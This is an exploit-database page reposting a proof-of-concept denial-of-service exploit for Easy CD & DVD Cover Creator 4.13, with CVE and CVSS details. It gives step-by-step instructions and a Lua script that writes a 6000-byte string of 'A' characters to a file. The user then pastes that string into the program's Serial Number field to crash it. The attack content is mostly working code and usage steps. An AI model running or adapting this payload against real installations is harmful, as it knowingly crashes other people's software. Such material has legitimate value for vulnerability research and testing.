Advertisement






Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)

CVE Category Price Severity
CVE-2006-2712 CWE-399 Not specified High
Author Risk Exploitation Type Date
Kozan High Local 2021-01-05
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010043

Below is a copy:

Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
-- Title  : Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
-- Writer : @uromulou 

-- How it works?
--
-- 1 . Run this lua script...
-- 2 . Open the file created and copy content to clipboard...
-- 3 . Open Easy CD & DVD Cover Creator.exe...
-- 4 . Press Unlik Now...
-- 5 . Paste the content of file created into the Field: 'Serial Number'...
-- 6 . Press 'Continue' and watch the program crash !
--

-- The Banner

print("-> Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)!")
print("-> The writer is the uromulou!\n")

-- The Code

local buf = string.rep("\x41", 6000)

local my_file = io.open("buf.txt", "w")
print(string.format("* Creating %s bytes payload...", string.len(buf)))
my_file:write(buf)
my_file.close()
print("* Evil file created!")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum